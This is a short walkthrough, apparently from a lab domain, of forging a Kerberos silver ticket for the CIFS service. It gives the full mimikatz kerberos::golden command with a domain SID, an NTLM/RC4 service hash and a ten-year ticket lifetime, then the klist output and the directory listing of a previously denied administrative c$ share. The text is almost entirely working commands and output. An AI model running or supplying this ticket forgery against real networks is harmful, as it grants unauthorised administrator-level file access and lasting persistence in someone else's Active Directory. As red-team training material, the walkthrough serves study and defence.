# Silver Ticket for CIFS

First, run the following command from WebServer:

```bash
C:\Users\adminwebserver>dir \\USER-SERVER.spartancybersec.corp\c$
Access is denied.

C:\Users\adminwebserver>hostname
WebServer

C:\Users\adminwebserver>whoami
spartancybersec\adminwebserver

C:\Users\adminwebserver>ipconfig

Windows IP Configuration
Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%14
   IPv4 Address. . . . . . . . . . . : 10.0.1.249
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
```

The output above shows that we do NOT have visibility into the server USER-SERVER.spartancybersec.corp from WEBSERVER.spartancybersec.corp: access to its `c$` share is denied.

We are going to generate a silver ticket for the CIFS service, which requires:

* The domain SID
* The NTLM hash of USER-SERVER

The command is as follows:

```powershell
C:\Users\Public\TOOLS>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt
User      : Administrator
Domain    : spartancybersec.corp (SPARTANCYBERSEC)
SID       : S-1-5-21-1861162130-2580302541-221646211
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_nt
Service   : CIFS
Target    : USER-SERVER.spartancybersec.corp
Lifetime  : 11/23/2023 7:14:27 PM ; 11/20/2033 7:14:27 PM ; 11/20/2033 7:14:27 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session

mimikatz # exit
Bye!
```

After that, we can verify that our ticket exists as follows:

```powershell
C:\Users\Public\TOOLS>klist

Current LogonId is 0:0xae5fb

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/23/2023 19:14:27 (local)
        End Time:   11/20/2033 19:14:27 (local)
        Renew Time: 11/20/2033 19:14:27 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
```

As the final result, we can now interact with the share successfully:

```powershell
C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$
 Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label.
 Volume Serial Number is 4C79-B015

 Directory of \\USER-SERVER.spartancybersec.corp\c$

11/14/2018  06:56 AM    <DIR>          EFI
05/13/2020  05:58 PM    <DIR>          PerfLogs
09/24/2022  03:51 AM    <DIR>          Program Files
09/19/2022  11:44 PM    <DIR>          Program Files (x86)
11/23/2023  07:10 PM    <DIR>          Users
11/13/2023  09:11 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  14,095,360,000 bytes free
```


